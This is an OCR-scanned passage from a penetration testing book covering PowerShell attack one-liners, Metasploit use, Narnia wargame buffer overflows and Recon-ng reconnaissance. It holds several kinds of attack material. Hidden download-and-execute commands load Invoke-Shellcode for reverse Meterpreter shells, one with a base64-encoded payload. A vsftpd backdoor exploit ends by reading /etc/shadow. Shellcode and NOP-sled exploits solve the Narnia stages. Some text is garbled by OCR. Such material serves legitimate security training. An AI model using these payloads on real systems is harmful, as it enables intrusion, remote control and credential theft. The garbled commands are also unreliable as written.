• -NonI: Noninteractive Mode - PowerShell does not present an interactive prompt to 
the user 

• -NoProfile (or -NoP): Enforces Power Shell console not to load the current user's 
profile 

• -noexit: Do not exit shell after execution. This is important for scripts like 
keyloggers, so that they continually run. 

• -W Hidden: Sets the window style for the session. This is so that the command 
prompt stays hidden. 

• 32-bit or 64-bit Power Shell: 

o This is also very important. Some scripts are only meant to run on 
their specified platform. So if you are on a 64bit box, you might need to 
execute 64-bit PowerShell to run the command. 



o 32-bit PowerShell Execution: powershell.exe -NoP -NonI -W 
Hidden -Exec Bypass 

o 64-bit PowerShell Execution: 

%WinDir%\syswow64\windowspowershell\vl .O\powershell.exe 
NoP -NonI -W Hidden -Exec Bypass 


To help you better understand what we will come across in the PowerShell adventures, here are some 
of the common execution commands that will be used throughout this book: 


The first command will download a PowerShell script from a web server and execute that script. In 
many cases, we are going to download a Meterpreter PowerShell script on a victim target via a 
command prompt: 

• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters] 


For example, if we want to execute a Meterpreter Shell on a target, we need to download this script: 

• https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invofe 
-Shellcode.ps 1 

We also need to know which parameters to use. The easiest way to find out what parameters you 
might need is to read the source code of the PowerShell Script. Go visit the Invoke—Shellcode.ps 1 
file. If we look at the Invoke—Shellcode.ps 1 file written by Mattifestation, we can see an example of 
how to call a reverse-https Meterpreter shell. 


^ £ 'I: , , tkm . IJ (Til « l' u ri #flt . f 0171/f hi ?j PiJ Sp liTi i t/iTii fl ff ,'CiYT# F t tJ t hJfVlW'Al - * S' -pit 
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Invoke-Shellcode.ps 1 


Our final PowerShell command will look like this: 

• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc 
-Shellcode.psE); Invoke-Shellcode -Payload windows/meterpreter/reverse https - 
Lhost 192.168.30.129 -Lport 80 








This makes PowerShell extremely easy and powerful to use. Let’s look at a few more examples. 


Let’s say you downloaded the same file onto the target. You don’t want to have to reach out to a web 
page to automatically download and execute the file. To locally run it: 


• powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import- 
Module [Path and File of PowerShell Script]; [Parameters]}" 


Lastly, throughout this book, I will regularly use base64 encoded PowerShell scripts both for 
obfuscation and for compacting my code. To run an encoded PowerShell Script: 


• powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code] 


Hopefully, this makes using PowerShell pretty straightforward and usable in your own tests. 


Easy-P 


Because this book is so heavily invested in PowerShell attacks, I created a little script to make 
PowerShell a little more accessible during a penetration test. Easy-P has some of the common 
PowerShell tools I use and the ability to encode my scripts. 


For every command, Easy-P will give you multiple ways to run the code both locally and remotely. 
Note that all the remote PowerShell scripts are linked to either my code or to forked versions of other 
people’s codes. I want to mention something here, which will be mentioned a couple more times 
throughout the book: Remember to fork your own copies off of the original sources, so that you don’t 
blindly run someone else’s code. You never know if someone is going to maliciously change the 
PowerShell script randomly and now, either nothing works or even worse, your shells are going 
somewhere else. Let’s dive into Easy-P to make your life much simpler. 


• cd /opt/Easy-P 

• python ./easy-p.py 



t ikall : /opt/Easy *P# python ./easy_p,py 
\ / _ V \ 

I \ / _< I i _ I _/ 

| \/_V \_\ \,_ | /_/ i | 

/_ (_ /_ >/_I I_I 

V V V V 
Power5hell/WMI Generator 

==Easy-P Menu System== 

1. Privilege Escalation 

2. Lateral Movement 

3. Keylogging 

4. PowerShell Interpreter 

5. Change Users Execution Policy 

6. Powershell 101 

7. Base64 Encode a PowerShell Script 

8. Exit/Quit 

What would you like to do: f 


THP Easy-P 


One of the most common things I will do in this book is use PowerShell Meterpreter Scripts. Once 
you execute the Easy-P script, select option 4. You will be presented with setting your localhost IP 
and the port on which you want the Meterpreter script to connect back. Once that is done, you will 
have an output similar to the following: 



what would you like to do: 4 


E T ]PowerSholl Metasploit Heterpreter Reverse HTTPS Shell 
LHOST: 192.168.1.100 
LPORT: 4444 

[MDownload from internet and execute: 

Powershell.exe -NoP -Nonl -W Hidden -Exec Bypass IEX (Mew-Object Net.WebClient),[ 
w. githuh. com/mafttif estation/PowerSploit/itiaster/CodeExecution/Invoke -Shellcocfe, psl 
load windows/meterpreter/reverse^https -Lhost 192.168.1,100 -Lport 4444 -Force 

[*]Run from a local copy of the scripts 

powersheU-ese -exec bypass -Command "& {Import-Module ,\Irvoke-Shellcode,psl; Ir 
indows/meterpreter/reverseJittps -Lhost 192.166,1,100 -Lport 4444 -Force} 1 ' 

p]6ase64 encoded version download and execute: 

powershell.exe -NoP -Non! -W Hidden -Exec Bypass -enc 5OBFAFgAIAAoAE4AZQB3AC0ATwE 
AFeAZQBiAEMAh A8 p A G U A b g B Q A C kA LgBEAG8AdwBuAGwAbwBhAGQAUwfiGAHIAaQBu AGcAK A AnACgAdA00/ 
C AaQBOAGg AdOB iAC 4 AYwBv AGGALwBtAGE AdAB0AGk AZgBlAHMAdABhAHQAaQB V AG4ALwB0 AGSA dw&lA HI 
c wBOAGUAc g A v AE M A hwB k A G U A RQB4 A GU A YwB1AHQAaQBvAG4ALwBJAG4AdgB v AGsAZO At AFfl A a ABlA GwA t 
ApAOsAIABJAG4AdgBvAGsA20AtAFHAaABlAGwAbABjAG8A2AB1ACAALQSOAGEAeOGsAGSAYOEkACAAdwE 
AGUAcgBwAHIAZOBOAGUAcgAvAHIAZQB2AGUAcgBzAGUAXwBoAHQAdABwAHHAIAAtAEwAaABvAHHAdAAgJ 
4AMOAwAD AAIAAtAEwAcABvAKIAdAAgADQANAAOADOAIAAtAE¥AbwB yAGM A ZQ A= 

E^lListner Resource Script (listener.re) - Save the following to a file called li 
x and load your handler with msfconsole -r listener.rc 
use multi/handler 

set payload windows/interpreter/reverse_https 

set LHOST 192.16B,1.100 

set LPORT 4444 

set ExitOnSession false 

exploit -i_ 


Example Easy-P Output 


You will get four different outputs: 

• Download from the Internet and execute: Download a Power Shell script from a 
website then execute that script. This is great when you only have a simple shell and 
do not have the ability to download files. 

• Run from a local copy of the script: If you have already pushed a PowerShell file to 
the system, it will output a command to import that PowerShell script and execute it. 

• Base64 encoded version of download and execute: If for some reason you want to 
obfuscate your encoded scripts or you run into character limitations, this will base64 
your code and give you the execution command. 

• Resource File: Lastly, you will be given the associated Resource File. A 
Metasploit resource file is a quick way to automatically set up a handler for the 
Meterpreter PowerShell script. Copy that resource script and save it to a file: 
/opt/listener.rc. 



All of the scripts are already configured to bypass execution policy, stay hidden, and run non¬ 
interactive. Take a look at all of the other menu choices in Easy-P, as it also has modules on Privilege 
Escalation, Lateral Movement, Keylogging, PowerShell Meterpreter, and Change Users Execution 
Policy. Feel free to fork my code and modify it to add all the PowerShell code you need. 


Learning 


This book is really geared toward those who have, at a minimum, some understanding of tools like 
Nmap, Metasploit, Cain and Abel, aircrack and others. You should also have a high level of 
understanding of attacks like buffer overflows and high-level languages like Python/Ruby. 


If you need a quick refresher or need to do some testing, here is a little starter pack for you: 


Metasploitable 2 


One comment I received was that there were no beginner walk-throughs on how to use Metasploit or 
fully test exploits using some of Metasploit’s features. This is where Metasploit 2 comes in as a great 
test bed. Before we get started, we need to download the VMWare Image for Metasploitable 2. 

Download: 

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 


Once you download Metasploitable 2, unzip it, and open it in VMware Player or Virtual Box, login 
with the user account msfadmin and password msfadmin. Now, you have your vulnerable VM image 
running. 

LAB 

Practice running Nmap, Masscan, or vulnerability tools against the vulnerable virtual machine. Once 
you find the system vulnerable to an exploit, let’s get a shell on it. In our example, we found and are 
going to take advantage of a flaw in vsftpd. So we can either do a search for the exploit (search 
vsftpd) or we can go straight into the exploit. 


• msfconsole 

• use exploit/unix/ftp/vsftpd_234_backdoor (selects the exploit) 

• show options (shows all the configuration options) 

• set RHOST [IP] (sets the Metasploitable 2 IP) 

• exploit (runs the exploit) 




msf > use exploit/unix/ftp/vsftpd_234_backdoor 

msf exploit (vsftpd_234_backdoor) > show options^^^^ 

Module options (exploit/unix/ftp/vsftpd_234_backdoor): 

Name Current Setting Required Description 


RHOST 
RPORT 21 


Exploit target: 
Id Name 
0 Automatic 


msf exploit (vsIi |»l 234 b . kdoor) > set RHOST 172.16.151.145 

RHOST => 172.16.151.145 

msf exploit ( vst i : i 1> i k i i) > exploit 

[*] Banner: 220 (vsFTPd 2.3.4) 

[*] USER: 331 Please specify the p 
[+] Backdoor service has been! spawned, fiandlind... 

[+] UID: uid=0(root) gid=0(ropt)K \/ _ A I L. I 

[*] Found shell. 

[*] Command shell session 1 opened (172.16.151.128:53836 -> ] 

at 2015 - 02-22 00 : 00:34 -0500 “the quieter you becom 

cat /etc/shadow 

root:$l$/avpfBJl$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: 
daemon:*:14684:0:99999:7::: 
bin:*:14684:0:99999:7::: 

sys:$l$fUX6BPOt$Miyc3UpOzQJqz4s5wFD910:14742:0:99999:7::: 


Metasploit Example 



yes The target address 

yes The target port 


We were successfully able to exploit this vulnerability and read the stored passwords with: cat 
/etc/shadow. To further dig into Metasploitable 2, check out the Rapid7 guide: 

https ://community.rapid7 .com/ docs/DOC-1875 . 


There are a ton of different vulnerabilities on this virtual machine. Make sure you spend time learning 
how to effectively use Metasploit and Meterpreter. If you are looking to get deeper into Metasploit, I 
recommend: 

http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X . 


Binary Exploitation 


Just like in the first edition of The Hacker Playbook, this book does not go deeply into binary 
exploitation, because this is a whole other topic that requires something like The Shellcoders 
Handbook f http://amzn.to/lE3k89R3 or Hacking: The Art of Exploitation, 2nd Edition 
( http://amzn.to/1 z8oThD l . However, this doesn’t mean that you shouldn’t have an understanding of 
buffer overflows and basic exploitation. Since all penetration testers should be able to “script” code, 
they should also be able to read other exploitation code. You might find a module in Metasploit that 
does not work and needs minor modifications or verification of what it does before you download an 
exploit from the Internet. 








There are a ton of different sites you can start with to get the basics down on binary exploitation. A 
great place to learn is on a site called Over the Wire t http: //o verthewire. or g/ war games/narnia/ 1 . 
Over the Wire is an online CTF-style challenge that focuses on all aspects of hacking from binary to 
web. In this chapter, we are only going focus on binary exploitation. If you have never done anything 
like this before, I would take a couple of weekends to hammer away at this site. To get you started, I 
will walk you through the first couple of challenges—however, it is up to you to continue down the 
path. 

Before you begin, study up a bit on: 

• Basic assembly and understanding registers 

• The basics on GDB (GNU Debugger) 

• Understand the different memory segments (the stack, heap, data, BSS, and code 
segments) 

• Shellcode basics 


Some resources that might help you start: 

• http: //op ens ecuritytraining. info/IntroX8 6 .html 

• http://www.reddit.eom/r/hacking/eomiuents/lwy610/exploit_tutorial_buffer_overflo 

• https: / / www .corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1 - 

stack-based-overflows/ 

• http://www.lethalsecurity.coiu/wiki 

• http://opensecuritytraining.info/Exploits 1 .html 

• https://exploit-exercises.com/protostar/ 


Narnia Setup 

( http: //o verthc w i re. or g/war games/narni a/ 1 


Stage 1 

Narnia is configured so that you SSH into their servers and all challenges are located under /narnia/. 
Let’s walk through the first three examples. From a terminal prompt on Kali or using something like 
Putty t http: / / www. chi ark, greenend. or g.uk/ ~s gtatham/ putty/ download. htmB on Windows: 

• ssh narniaO@narnia.labs.overthewire.org 

• Password: narniaO 

• cd /narnia/ 


Each challenge is laid out in a manner that shows you both the C code and the binary executable. For 
challenge 0, we have both a narniaO and narniaO.c file. Let’s take a look at the raw C code: 

• cat narniaO.c 













#Ofl admin — narniaO@>melmda: /narnia — ssh — 125x‘ 

|narnia0@melinda:/narnia$ cat narnia0.c 

1 

This program is free software; you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published by 
the Free Software Foundation; either version 2 of the License, or 
(at your option) any later version. 

This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 

You should have received a copy of the GNU General Public License 

along with this program; if not, write to the Free Software 

Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 

I */ 

#include <stdio.h> 

#include <stdlib.h> 


int main(){ 

long va1=0x4141 4141; 
f char buf [20]; [ 


printf("Correct val's value from 0x41414141 -> @xdeadbeef!\n"); 
printfC'Here is your chance: "); 
scanf("%24s",&buf); 

printf("buf: %s\n",buf); 
printf("val: 0x%08x\n",val); 

if(val==0xdeadbeef) 

system("/bin/sh"); 

else { 

printf("WAY OFF!!!!\n"); 
exit(l); 

> 


} 


return 0; 


Narnia 0 - Code 


After taking a quick look at the code, we see the variable “val” is assigned to the hex value of 
“AAAA”. Next, we see that it takes an input with buffer length of 20 bytes. A few lines later, we see 
that scanf() expects 24 bytes maximum. This is your very simple buffer overflow type example. Now, 
let’s run the executable, and, as a test, supply it 20 A’s and 4 B’s (because we know the hex value of 
A = 41 and B = 42). So at the command prompt, it should look something like this: 


• narniaO@melinda:/narnia$ ./narniaO 

• Correct val's value from 0x41414141 -> Oxdeadbeef! 

• Here is your chance: AAAAAAAAAAAAAAAAAAAABBBB 

• buf: AAAAAAAAAAAAAAAAAAAABBBB 

• val: 0x42424242 

• WAY OFF!!!! 


Great! Since the HEX value at “val” is 0x42424242 (42 translates to ASCII letter B), we know that 
we are able to overwrite the value of “val” in memory, which was previously 0x41414141. All we 
have to do now is overwrite this value in memory with Oxdeadbeef. The thing to remember is that 
everything must be written to the stack in Little Endian format 
(http://en.wikipedia.org/wiki/Endianness), meaning the last byte in Oxdeadbeef must be the first byte 
pushed to the stack to overwrite the value of “val”. This is due to the First-In, Last-Out (FILO), or 
Last-In, First-Out (LIFO) architecture of the target machine’s stack. So, to supply our Oxdeadbeef 
value, we will have to write it as “\xef\xbe\xad\xde”. The easiest way to only supply HEX values and 






execute our A’s is using python and piping it into our narniaO example. Let’s see this in action: 


• narniaO@melinda:/narnia$ python-c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narniaO 

• Correct val's value from 0x41414141 -> Oxdeadbeef! 

• Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA ? 

• val: Oxdeadbeef 

Great x2! We now have written deadbeef in our “val” variable. How can we run shell commands? If 
we go back to our C code, we see that if we match deadbeef, /bin/sh gets called. So let’s take our 
python code and try to read the key located at /etc/narnia_pass/narnial: 

• narniaO@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat 
/etc/narnia_pass/narnial') | /narnia/narniaO 

• Correct “val's” value from 0x41414141 -> Oxdeadbeef! 

• Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA□? 

• val: Oxdeadbeef 

• [Answer to Stage 1 ] 


narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; 
echo 'cat /etc/narnia_pass/narnial') | /narnia/narnia0 
Correct val's value from 0x41414141 -> 0xdeadbeef! 

Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA*? 

val: 0xdeadbeef 

efeidiedae 

Narnia 0 - Exploit 


If you were successful, you have defeated stage 1 and earned the password to the narnial account. We 
need to log out and log into the newly gathered account. 


Stage 2 

After you finish each stage, you get the password to the next account. Let’s log into stage 2 using the 
narnial account we just obtained. 

Log into stage 2: 

• ssh narnial@narnia.labs.overthewire.org 

• Password: [Password From Narnia 1] 

• cd /narnia/ 

• cat narnial.c 



int main(){ 

int (♦ret)(); 

if (getenvC’EGG" )==NULL) { 

printf("Give me something to execute at the env-variable EGG\n"); 
exit(l); 

} 

printf("Trying to execute EGG!\n"); 

ret = getenvC'EGG"); 

ret(); 

Narnia 1 - Code 


Reading the C code, we see a couple of things immediately: 

• int (*ret)(); - is a pointer to ret to get it’s value 

• getenv - takes in an environment variable EGG and stores it to the variable ret 

• Calls ret() 

If we can store shellcode into the environment variable EGG, then whatever shellcode is stored there 
will be executed. The easy way to do this is to take the shellcode for /bin/sh and set it to an 
environment variable EGG. 


• We will use the shellcode for /bin/sh from this example: 
http://shell-storm.org/shellcode/files/shellcode-811 .php 

• export EGG='python -c 'print 

"\x3 I\xc0\x50\x68\x2f\x2hx73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc I\x89\xc2\xb0\x 

• ./narnial 

• cat/etc/narnia_pass/narnia2 

narmaI@rneUnda: /narnia 

Fite Edit View Search Terminal Help 


narnial@mel.inda;/rarnia$ export EGG-'python -c 'print "\x31\xc0\x5i 
8\x2f\x62\x69\x6e\x89\xe3\x89\xcl\x89\xc2\xbG\xGb\xcd\x8G\x31\xcG 
narnial Belinda :/narnia$ ,/narnial 
Trying to execute EGG! 

$ cat /etc/namiajpass/narnia2 
nairiepecu 

I 


Narnia 1 - Exploit 


We now have the password to the narnia2 account and can move on to stage 3. 




Stage 3 

For stage 3: 

• ssh narnia2@narnia.labs.overthewire.org 

• Password: [Password from Narnia 2] 

• cd /narnia/ 

• cat narnia2.c 

Looking at the C code, we see the following: 

• char buf[128]; 

• if(argc == 1){ 

• printf("Usage: %s argument\n", argv[0]); 

• exit(l); 

• } 

• strcpy(buf,argv[l]); 

• printf("%s", but); 


By looking at the code, we see that it takes an argument and copies it into buf. We see that there is a 
char buf of 128 bytes, so let’s start by sending 200 characters: 

• narnia2@melinda:/narnia$ ./narnia2 'python-c 'print "A" * 200’' 

• Segmentation fault 

We just verified that sending 200 characters causes the application to have a segmentation fault. We 
need to identify how many bytes before we overwrite EIP. We can do this with a Metasploit module 
called pattern create.rb. This module creates a unique string and in our example below, we will 
create a string of 200 bytes. Since this string never repeats, we can identify exactly where our 
program overflows EIP. 


• /usr/share/metasploit-framework/tools/pattern_create.rb 200 

• AaOAal Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Abl Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab ( S 

Now, let’s run our new custom unique string through narnia2 to see how many bytes it takes before 
we cause a segmentation fault. To see the exact results of our segmentation fault, we will have to use 
a debugger. By default, Linux systems have a debugger called gdb. Although it isn’t the easiest 
debugger to use, it is extremely powerful: 


• gdb ./narnia2 -q 

• run 'python -c ’print 


"AaOAal Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Abl Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9y 


The result of the query is: 



iarnia2@melinda:/narnias gdb ./narnia2 -q 

heading symbols from ,/narnia2...(no debugging symbols found)...done, 
(gdb) run 'python -c 'print "Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0AblAb2Ab3A 
BAd9Ae0AelAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0AflAf2Af3Af4Af5Af6Af7Af8Af9Ag0AglAg 
Starting program: /games/narnia/narnia2 ‘python -c 'print "Aa0AalAa2Aa3A 
BAc9Ad0AdlAd2Ad3Ad4Aa5Ad6Ad7Ad8Ad9Ae0AelAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0AflAf 

3 roqram received siqnal SIGSEGV, Segmentation fault. 

3x37654136 in 7? () _ 

Narnia 2 - Exploit 


• Program received signal SIGSEGV, Segmentation fault. 

• 0x37654136 in ??() 

The output from our command is 0x37634136. We need to look in our original string to find that exact 
value. To find the exact number of bytes where the segment fault was caused, we can use Metasploit’s 
patternoffset.rb: 

• /usr/share/metasploit-framework/tools/pattern offset.rb 0x37654136 

• [*] Exact match at offset 140 

This shows that after 140 characters, we can control EIP. To verify this, we can run narnia2 with an 
input of 140 bytes and we should be able to overwrite EIP with an extra 4 bytes. We are going to use 
a debugger to watch it happen in memory. 


The output should look like the following: 

• cd /narnia 

• gdb ./narnia2 -q 

• (gdb) run 'python -c 'print "A" * 140 + "B" * 4 n 

o Starting program: /games/narnia/narnia2 'python -c 'print "A" * 140 

_|_ MgM * 


o Program received signal SIGSEGV, Segmentation fault. 
o 0x42424242 in ??() 

• (gdb) info registers 

o eax 0x0 0 

o ecx 0x0 0 

oedx 0xf7fcb898 -134432616 

o ebx 0xf7fca000 -134438912 

o esp 0xffffd640 0xfffifd640 

o ebp 0x41414141 0x41414141 

o esi 0x0 0 

o edi 0x0 0 

o eip 0x42424242 0x42424242 


We were able to overwrite EIP with all “B” (or hex equivalent 0x42) characters, which is the pointer 
to the code that will be executed next by the processor. If we can point EIP to an area of shellcode, 



we can compromise the system. Where might you find shellcode? You can always generate your own 
or you can grab shellcode from here: 

http://shell-storm.org/shellcode/ . 


In this example, we are going to use Linux/x86 - execve(/bin/sh) - 28 bytes. We know our shellcode 
is 28 bytes and our payload needs to be 144 bytes in length. I also want to change my A’s to NOPs or 
x90, which means if we land on a NOP, it will continue until we hit executable code. After playing 
around a little with the space, I created the following: 

• cd /narnia 

• gdb ./narnia2 -q 

• run 'python -c 'print "\x90" * 50 + 

"\x31 \xc0\x50\x6 8\x2f\x2 ftx73\x68\x6 8\x2f\x62\x69\x6e\x89\xe3\x50\x5 3\x89\xe 1 \xbO\?< 
+ "\x90" * 67 + "BBBB’"' 

o Starting program: /games/narnia/narnia2 'python-c 'print "\x90" * 50 
+ 

"\x31\xc0\x50\x68\x2ftx2f\x73\x68\x68\x2ftx62\x69\x6e\x89\xe3\x50\x5; 
+ "\x90" * 67 + "BBBB"'' 

o Program received signal SIGSEGV, Segmentation fault. 
o 0x42424242 in ??() 

• (gdb) info registers eip 

o eip 0x42424242 0x42424242 

We successfully have control of EIP with our shellcode and NOPs. Now, we need to just drop in 
anywhere before our NOPs and we should have a /bin/sh shell. To see what is stored in the memory, 
after we seg fault, type: 

• x/250x $esp 


Scrolling through, you should see something like the following: 


0xffffd780 

0x00000004 

0x00000020 

0x00000005 

0x00000008 

0xffffd790 

0x00000007 

0xf7fdc000 

0X00000008 

0X00000000 

0xffffd7a0 

0x00000009 

0X08048360 

0x0000000b 

0x000036b2 

0xffffd7b0 

0x0000000c 

0x000036b2 

0x0000000d 

0x000036b2 

0xffffd7c0 

0x0000000e 

0x000036b2 

0x00000017 

0x00000000 

0xffffd7d0 

0x00000019 

0xffffd7fb 

0X0000001f 

0xffffdfe2 

0xffffd7e0 

0X0000000f 

0xffffd80b 

0X00000000 

0X00000000 

0xffffd7f0 

0X00000000 

0X00000000 

0x4a000000 

0x4a448600 

0xffffd800 

0xlblf07ce 

0x2b6dbf8d 

0x698c040a 

0x00363836 

0xffffd810 

0x672f0000 

0x73656d61 

0x72616e2f 

0x2f61696e 

0xffffd820 

0x6e72616e 

0x00326169 

0x90909090 

0x90909090 

0xffffd830 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0xffffd840 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0xffffd850 

0x90909090 

0x90909090 

0XC0319090 

0x2f2f6850 

0xffffd860 

0x2f686873 

0x896e6962 

0x895350e3 

0xcd0bb0el 

0xffffd870 

0x90909080 

0x90909090 

0x90909090 

0x90909090 

0xffffd880 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0xffffd890 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0xffffd8a0 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0xffffd8b0 

0x90909090 

0x42424242 

0x47445800 

0x5345535f 

-Type <return> to continue. 

or q <return> 

to quit- 


0xffffd8c0: 0x4e4f4953 

0x3d44495f 

0x36343832 

0x48530034 

0xffffd8d0 

0x3d4c4c45 

0x6e69622f 

0x7361622f 

0x45540068 

0xffffd8e0 

0x783d4d52 

0x6d726574 

0x3635322d 

0x6f6c6f63 

0xffffd8f0: 0x53530072 

0x4c435f48 

0x544e4549 

0x2e30373d 



NOP Sled 







We see our initial NOPs (x90), followed by our shellcode, more NOPs, and lastly, our BBBB. We 
need to change our BBBB to an address in our NOP Sled to execute our shellcode. An easy address is 
0xffffd850—a stack address which points to our first set of NOPs. Let’s give it a try and don’t forget 
Little Endian. 


• (gdb) run 'python -c 'print "\x90" * 50 + 

''\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xel\xb0A 
+ "\x90" * 67 + "\x50\xd8\xfftxff"' 

o Starting program: /games/narnia/narnia2 'python -c 'print "\x90" * 50 
+ 

"\x31 \xc0\x5 0\x6 8\x2 Lx2 f\x7 3\x6 8\x6 8\x2 Lx62\x6 9\x6e\x8 9\xe3\x5 0\x5! 
+ "\x90" * 67 + "\x50\xd8\xfExff"' 
o process 5823 is executing new program: /bin/dash 

• $ cat /etc/narnia_pass/narnia3 

o cat: /etc/narnia_pass/narnia3: Permission denied 


We were able to get our shellcode to execute and get our shellcode to run, but for some reason we 
couldn’t read the narnia3 password. Let’s try this outside of GDB: 

• narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "\x90" * 50 + 

"\x31\xc0\x50\x68\x2f\x2t\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xel\xb0b< 
+ "\x90" * 67 + "\x50\xd8\xff\xff"' 

• $ cat/etc/narnia_pass/narnia3 

o [Answer to Narnia3 Here] 


narnia2@melinda;/narnia$ ./narnia2 ’python -c 'print "\x90" * 50 + "\x31' 
8\x2f\x2f\x73\x68vx68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xel\xb0\x0b\xc< 
x90“ * 67 + 1 ‘\x50\xd8\xff\xff'"‘ 

$ cat /etc/narria_pass/narnia3 

Narnia 2 - Exploit 


And there it works! We now have a privileged shell and can read the password for narnia3. 
Hopefully, this gives you an initial insight into how buffer overflows work and why they work. 
Remember that this was a quick 1000-foot view of binary exploitation. It is now up to you to spend 
some time trying some of the other examples. 


Summary 


What this chapter has tried to do is to help you build a standard platform for testing, make sure you 
have a strong foundation of PowerShell, and give you an understanding of the basics of binary 



exploitation. 


Tools will always change, so it is important to keep your testing platforms up-to-date and patched. I 
have included all the tools that are used in this book and, hopefully, this information will be enough to 
get you started. If you feel that I am missing any critical tools, feel free to leave comments at: 

http: // www .thehackerplaybook.com . 

Take a full clean snapshot of your working VMs and let’s start discovering and attacking networks. 



Before The Snap - Scanning The Network 


The game has started and you walk onto the SUCK, Inc. field. Before the first kickoff, and before we 
even attack our unsuspecting victim, we need to analyze our opponent. Studying the target for 
weaknesses and understanding the environment will provide huge payoffs. This chapter will take a 
look at scanning from a slightly different aspect than the normal penetration testing books and should 
be seen as an additive to your current scanning processes, not as a replacement. 

Whether you are a seasoned penetration tester or just starting in the game, scanning has probably been 
discussed over and over again. I am not going to compare in detail all the different network scanners, 
vulnerability scanners, SNMP scanners and so on, but I will try to give you my most efficient process 
for scanning. This section will be broken down into Open Source Intelligence, External Scanning, 
Internal Scanning, and Web Application Scanning. 


Passive Discovery - Open Source Intelligence (OSINT) 


Trained in Open Source Intelligence, you use your knowledge of where information exists on the 
Internet to find as much information about SUCK as we can. We want to become one with these Cyber 
Kittens, find their secrets, understand their verbiage, and find their employees. 

Before you ever even start performing any OSINT tests, it is best if you create fake social media 
accounts. Some examples of these might be (the more you have the better): 

• Linkedln 

• Twitter 

• Google+ 

• Facebook 

• Instagram 

• MySpace 

• Glassdoor 

You don’t want to use your own personal accounts as many of the sites show who visited your pages. 
This could be a quick way to get identified and potentially kill your whole mission. Now that we are 
ready with the OSINT setup, let’s start gathering data. 


We will start with Passive Discovery, which will search for information about the target, network, 
clients, and more without ever touching the targeted host. This is great because it uses resources on 
the Internet without ever alerting the target of any suspicious activity. You can also run all these 
lookups prior to an engagement to save you an immense amount of time. Let’s start reviewing some 
sources and tools for OSINT. 


Recon-NG 



fhttps://bitbucket.org/LaNMaSteR53/recon- ng ) (Kali Linux) 


Recon-NG is a great tool for querying Open Source Intelligence (OSINT) for passive information 
about a company. This should be one of the first places you start before you pentest any organization. 
It can give you a lot of information about IP space, naming conventions, locations, users, email 
addresses, possible password leaks, and more. 



I 



Recon-ng 


Prerequisites 

There are some modules like Linked-In or Jigsaw that provide great value, but you do need to get API 
keys for those. I will walk you through one API key example, which is tree and easy to use. 

To use the ipinfodb database to find the exact location of all the IPs you identify, you need to get an 
API key. Go to: http://ipinfodb.com/register.php and register for a key. We will add the key to our 
local store database during our next example. 

To run Recon-Ng 


• cd /opt/recon-ng 

• ./recon-ng 

• workspaces add [Company Name - example SUCK Company] 

• add domains [DOMAIN - example suck.testlab] 

• add companies 

• use recon/domains-hosts/bing domain web 


o Look through Bing for domain names 


• run 

• use recon/domains-hosts/googlesiteweb 


o Look through Google for domain names 








• run 

• use recorf domains-hosts/baidusite 

o Look through Baidu (Chinese Search Engine) for domain names 

• run 

• use recorf domains-hosts/brutehosts 

o Brute-force subdomains 

• run 

• use recon/domains-hosts/netcraft 

o Look at netcraft for domain names 

• run 

• use recon/hosts-hosts/resolve 

o Resolve all the domain names to IP 

• run 

• use recon/hosts-hosts/reverse resolve 

o Resolve all the IPs to hostnames/domain names 

• run 

• use discovery/info disclosure/interesting files 

o Look for a few files on the identified domains 

• run 

• keys add ipinfodb api [KEY ] 

o This is where you add your infodb API key from earlier 

• use recorfhosts-hosts/ipinfodb 

o Lind the location of the IPs that were discovered 

• run 

• use recon/domains-contacts/whois_pocs 

o Lind email addresses from the whois lookup 

• run 

• use recon/domains-contacts/pgp search 

o Look through the public PGP store for email addresses 

• run 

• use recon/contacts-credentials/hibp_paste 

o This will check all of the email accounts you have gathered against 
the “Have I Been PWN’ed” website. This will let you know if there 
are potentially leaked passwords that you might be able to use. 

• run 

• use reporting/html 

o Create a report 

• set CREATOR HP2 

• set CUSTOMER HP2 

• run 

• exit 

• firefox /root/.recon-ng/workspaces/SUCK_Company/results.html 



This will create a report of all the findings in one single web page. Let’s take a look at what type of 
valuable data has been gathered: 


ft ///root/ r«<00-09/*ork*p»c*w'SUCK-Corrpany/r«sults html 

veils 
